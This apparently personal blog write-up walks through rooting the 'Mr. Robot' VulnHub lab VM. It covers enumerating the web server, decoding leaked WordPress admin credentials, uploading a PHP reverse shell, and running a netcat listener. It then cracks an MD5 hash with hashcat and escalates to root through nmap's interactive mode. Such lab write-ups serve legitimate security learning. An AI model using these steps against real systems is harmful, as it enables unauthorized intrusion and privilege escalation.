“Mr. Robot” VulnHub VM Writeup

Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.


The Mr. Robot VM is running on a host-only adapter/network of The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:

nmap -vv


Scanning [1000 ports]
Discovered open port 443/tcp on
Discovered open port 80/tcp on
Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports)
Nmap scan report for
Host is up, received arp-response (0.00077s latency).
Scanned at 2016-08-30 02:10:30 CDT for 6s
Not shown: 997 filtered ports
Reason: 997 no-responses
22/tcp  closed ssh     reset ttl 64
80/tcp  open   http    syn-ack ttl 64
443/tcp open   https   syn-ack ttl 64

Right away, we see the IP address of the machine is and that ports 80 and 443 are open. Navigating to in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.

Now we’ll run DirBuster to try and enumerate the files/folders on the web-server:


And get a big list of results to look through:

---- Scanning URL:
+ (CODE:301|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:1077)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:516314)
+ (CODE:200|SIZE:309)
+ (CODE:302|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:403|SIZE:94)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:64)
+ (CODE:200|SIZE:41)
+ (CODE:200|SIZE:41)
+ (CODE:301|SIZE:0)
+ (CODE:301|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:227)
+ (CODE:200|SIZE:0)
+ (CODE:200|SIZE:2685)
+ (CODE:500|SIZE:3064)
+ (CODE:500|SIZE:0)
+ (CODE:302|SIZE:0)
+ (CODE:405|SIZE:42)
+ (CODE:405|SIZE:42)

We see that WordPress is installed. But before messing with that, it’s crucial that we go through every other file/folder and look for useful information. The first interesting file we find is NOTE: At first glance, this page just has one line of text taunting us. Make sure you look at the ENTIRE THING!

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?


do you want a password or something?



At the very bottom of the file/page, we find what looks to be a base-64 encoded string. Let’s try decoding it in the terminal:

echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d

Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.


After continuing to look through the files and directories found by DirBuster, we make our way into the robots.txt file. In there, we find two very interesting files:

User-agent: *

The fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to, we find the first of three flags:



With the first flag captured and the enumeration/looting of the webserver’s public files/directories complete, it’s time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we’re able to log into WordPress. It becomes immediately apparent that elliot is the administrator account:

Mr. Robot Vulnerable Machine - VulnHub

Now that we have access to the WordPress administrator account, we should be able to set up a reverse-shell back to a listener on our attack machine. I used a php reverse-shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.

Before executing the code on the server, let’s first set up a listener on our attack machine:

nc -lvp 666

//Note:Make sure you set this to whatever port your shell is trying to connect back to. I used 666 in this example.

With a listener running, we can now use the browser to navigate to the location of our shell code( and hopefully get a shell on our attack machine:

PHP Reverse-shell on Mr. Robot Vulnerable Machine

With a shell established, let’s begin looking around. I tend to start in the home directory and in this instance we find a folder for a user named “robot”. Let’s cd into that folder and take a look if we can:

$cd /home/robot/
$ ls -asl
total 16
4 drwxr-xr-x 2 root  root  4096 Nov 13  2015 .
4 drwxr-xr-x 3 root  root  4096 Nov 13  2015 ..
4 -r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
4 -rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5

We find the 2nd key file, however we can’t read it due to the permissions. However, there is a file named password.raw-md5 that we can read:

$ cat password.raw-md5

It looks to be the login and password hash for the user “robot”. Let’s place that hash in a text file on our attacker machine named hashes, and then use HashCat and the rockyou.txt wordlist to try and crack it:

hashcat -a 0 -m 0 hashes rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Added hashes from file hashes: 1 (1 salts)
Activating quick-digest mode for single-hash

All hashes have been recovered

Input.Mode: Dict (rockyou.txt)
Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 2.77M words
Progress..: 1853946/3627099 (51.11%)
Running...: 00:00:00:01
Estimated.: --:--:--:--

So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.


When attempting to login as “robot” by using ‘su – robot’, I kept getting an error saying I could only execute this command from a terminal. I managed to get around this by borrowing the following command from g0tmi1k’s Basic Linux Privilege Escalation page:

python -c 'import pty;pty.spawn("/bin/bash")'

Which then allowed me to login as robot:

daemon@linux:/$ su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami

Now that we’re logged in as robot, we can finally read the 2nd flag file:

$ cat /home/robot/key-2-of-3.txt


Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db/etc, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM, and that I should look into that. After some Google searching, I learned that nmap’s interactive mode could be used to escalate privileges in certain scenarios.

From there, it was smooth sailing and I managed to quickly get root privileges and read the third and final flag file:

Getting root on Mr. Robot Vulnerable Machine


This was a fun machine overall and taught me a few things:

First: How easily an Admin account on WordPress can be leveraged to get a shell on a server.

Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.

Enumerate, enumerate, enumerate…And then Google everything you find.

E-Mail MeTwitter @NetSecDave